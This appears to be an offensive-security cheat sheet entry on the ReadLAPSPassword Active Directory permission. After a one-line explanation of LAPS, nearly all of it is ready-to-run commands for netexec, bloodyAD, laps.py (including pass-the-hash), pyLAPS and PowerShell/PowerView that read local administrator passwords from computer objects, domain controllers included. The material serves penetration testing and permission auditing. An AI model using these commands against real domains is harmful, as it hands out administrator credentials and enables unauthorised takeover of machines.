ReadLAPSPassword
Information
LAPS is a Windows feature that automatically manages and backs up the password of a local administrator account on Windows Server AD-joined devices.

Exploitation
Linux
# read the password of all computers
nxc ldap <ip> -u <user> -p <pass> -M laps
# read the password of a specific computer
nxc ldap <ip> -u <user> -p <pass> -M laps -o COMPUTER='DC01$'

# bloodyAD: read the ms-Mcs-AdmPwd attribute of a computer object
bloodyAD -u <user> -d <domain> -p <pass> --host <ip> get object 'COMPUTER$' --attr ms-Mcs-AdmPwd

# basic usage
python laps.py -u <user> -p <pass> -d <domain>
# PtH on specific LDAP server
python laps.py -u <user> -p <hash> -d <domain> -l <fqdn>

# read the password of all computers
pyLAPS.py --action get -u <user> -d <domain> -p <pass> --dc-ip <ip>
# read the password of a specific computer
pyLAPS.py --action get --computer 'DC01$' -u <user> -d <domain> -p <pass> --dc-ip <ip>

For an example of reading the LAPS password with NXC, check Timelapse.
Windows
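# ActiveDirectory module: computers that have a LAPS expiration time set
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# PowerView: LAPS attributes of a specific computer
Get-DomainComputer "DC01" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

Resources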